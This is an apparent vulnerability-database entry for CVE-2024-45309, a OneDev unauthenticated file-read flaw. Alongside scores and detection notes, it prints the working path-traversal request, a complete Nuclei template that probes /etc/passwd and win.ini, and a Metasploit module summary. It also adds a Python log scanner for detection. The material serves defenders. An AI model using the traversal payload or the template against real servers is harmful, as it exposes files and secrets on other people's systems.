CVE-2024-45309
Published 2024-10-21. CVE-2024-45309: OneDev is a Git server with CI/CD, kanban, and packages. A vulnerability in versions prior to 11.0.9 allows unauthenticated users to read arbitrary files…
Priority: P182 · high · CVSS 3.1 base score 7.5
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 24.82% (97.6th percentile)
OneDev is a Git server with CI/CD, kanban, and packages. A vulnerability in versions prior to 11.0.9 allows unauthenticated users to read arbitrary files accessible by the OneDev server process. This issue has been fixed in version 11.0.9.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| onedev_project | onedev | < 11.0.9 | 11.0.9 |
| theonedev | onedev | < 11.0.9 | 11.0.9 |
Detection & IOCs (extracted from sources)
url: GET {{project}}/~site////////%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{{path}} HTTP/1.1
path: /~site////////%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/
Sigma: HTTP GET request path contains '/~site/' followed by multiple '%2e%2e' path traversal sequences
- Detect path traversal attempts targeting the OneDev `/~site/` endpoint with URL-encoded dot-dot sequences (`%2e%2e`) in HTTP GET requests; no authentication is required for exploitation.
- Successful exploitation returns HTTP 200 with `Content-Disposition: filename=` and `Content-Type: application/octet-stream` headers; alert on these response headers combined with a traversal path in the request.
- A valid OneDev project name is required to exploit the vulnerability; attackers may brute-force project names using a wordlist if anonymous access is disabled.
- If anonymous access is enabled, any unauthenticated visitor can enumerate existing project names, lowering the bar for exploitation; monitor for unauthenticated project listing requests.
- Probe payloads target `/etc/passwd` (Linux) and `/windows/win.ini` (Windows); alert on these file paths appearing in HTTP request URIs against OneDev instances.
- The vulnerability affects OneDev versions prior to 11.0.9 (i.e., <= 11.0.8); version 11.0.9 contains the fix, so scope detections to unpatched instances.
- The traversal payload uses multiple leading slashes (`////////`) before the `%2e%2e` sequences; detection rules must account for this slash-padding technique and not rely solely on a single `../` pattern.
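The detection notes above boil down to one normalization problem: the request path must be percent-decoded (more than once, to unwind double encoding) and slash runs collapsed before a `..` component after `/~site/` is matched. The following access-log scanner is an added example written for this page, not code from the CVE record, OneDev, or any of the indexed tools; it assumes Common Log Format lines, and the sample lines, IP addresses and project name `demo` are constructed.

```python
"""Scan web-server access logs for CVE-2024-45309-style traversal requests
against OneDev's /~site/ endpoint. Added example; not from the CVE record."""
import re
from urllib.parse import unquote

SITE_SEGMENT = "/~site/"
# A bare ".." path component after decoding and slash collapsing.
DOTDOT = re.compile(r"(?:^|/)\.\.(?:/|$)")
# Common Log Format request field and status: "METHOD PATH HTTP/x.y" NNN
REQUEST = re.compile(r'"([A-Z]+) (\S+) HTTP/[0-9.]+" (\d{3})')


def normalize_path(raw):
    """Percent-decode (bounded, so %252e%252e unwinds) and collapse slash runs."""
    path = raw
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return re.sub(r"/{2,}", "/", path)


def classify_request(method, raw_path, status):
    """Return None for a benign request, else a dict describing the hit."""
    if method != "GET":
        return None
    path = normalize_path(raw_path)
    if SITE_SEGMENT not in path:
        return None
    # Only traversal *after* the /~site/ segment is in scope for this CVE.
    tail = path.split(SITE_SEGMENT, 1)[1]
    if not DOTDOT.search(tail):
        return None
    return {
        "normalized": path,
        "status": status,
        # A 200 on a traversal path is the "successful exploitation" signal
        # the detection notes describe (pair with response headers if logged).
        "likely_success": status == 200,
    }


def scan_access_log(lines):
    """Yield a verdict dict for every log line that carries a traversal hit."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        verdict = classify_request(m.group(1), m.group(2), int(m.group(3)))
        if verdict:
            hits.append(verdict)
    return hits


# Constructed sample log lines (project name "demo" and addresses are made up).
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Oct/2024:10:00:00 +0000] "GET /demo/~site////////%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1780',
    '203.0.113.5 - - [21/Oct/2024:10:00:01 +0000] "GET /demo/~site/%252e%252e/%252e%252e/windows/win.ini HTTP/1.1" 404 0',
    '198.51.100.7 - - [21/Oct/2024:10:00:02 +0000] "GET /demo/~site/index.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [21/Oct/2024:10:00:03 +0000] "GET /demo/~site/notes/..archive/index.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [21/Oct/2024:10:00:04 +0000] "POST /demo/~site/../x HTTP/1.1" 405 0',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

The slash-collapse step is what defeats the `////////` padding called out in the last bullet, and the bounded decode loop catches a double-encoded `%252e%252e` variant without looping forever on pathological input; `..archive` is deliberately not flagged, since `DOTDOT` requires a whole `..` component.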
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | 4.0 | 8.7 | HIGH | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
| vulncheck | | 8.7 | HIGH | |
No detection rules found.
Nuclei: OneDev.io < 11.0.9 - Arbitrary File Read (CVSS 8.7, HIGH)
The indexed template, with the `id`, `info` and `http` structure that the extraction dropped restored (the `author` field is not shown on this page and is left as a placeholder; the `[fonts]`/`[extensions]`/`[files]` regex had its backslashes doubled and is corrected):

```yaml
id: CVE-2024-45309

info:
  name: OneDev.io < 11.0.9 - Arbitrary File Read
  author: unknown  # not shown on this page
  severity: high
  description: |
    OneDev is a Git server with CI/CD, kanban, and packages. A vulnerability in
    versions prior to 11.0.9 allows unauthenticated users to read arbitrary files
    accessible by the OneDev server process. This issue has been fixed in version 11.0.9.

http:
  # "internal: true" is kept as shown on the page; in nuclei flow templates it
  # marks a request that runs only when driven by a flow, which this page does not include.
  - internal: true
    raw:
      # {{project}} is a valid OneDev project name supplied at run time (-var project=<name>);
      # {{path}} is filled from the payloads list below.
      - |
        GET {{project}}/~site////////%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{{path}} HTTP/1.1
        Host: {{Hostname}}

    payloads:
      path:
        - /etc/passwd
        - /windows/win.ini
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      # Body: a root entry from /etc/passwd, or a win.ini section header.
      - type: regex
        regex:
          - 'root:.*:0:0:'
          - '\[(font|extension|file)s\]'
        condition: or

      # Headers: the file is served as an attachment download.
      - type: word
        part: header
        words:
          - 'filename='
          - 'application/octet-stream'
        condition: and

      - type: status
        status:
          - 200
# digest (signature of the indexed template as shown on the page):
# digest: 4b0a00483046022100a1be84d7e6e775167cdf43ae15612c4129f9f0726563abdcfe963ba68eef6e23022100eadc0809b86c51f4ebf744d6d510dff70492abf7d979d42bbe33b15c541231b6:922c64590222798bb761d5b6d8e72950
```
Metasploit: OneDev Unauthenticated Arbitrary File Read (CVSS 8.7, HIGH)
This module exploits an unauthenticated arbitrary file read vulnerability (CVE-2024-45309), which affects OneDev versions <= 11.0.8. To exploit this vulnerability, a valid OneDev project name is required. If anonymous access is enabled on the OneDev server, any visitor can view existing projects without authentication. However, when anonymous access is disabled, an attacker who lacks prior knowledge of existing project names can use a brute-force approach. By providing a user-supplied wordlist, the module may be able to guess a valid project name and subsequently exploit the vulnerability.
No writeups or analysis indexed.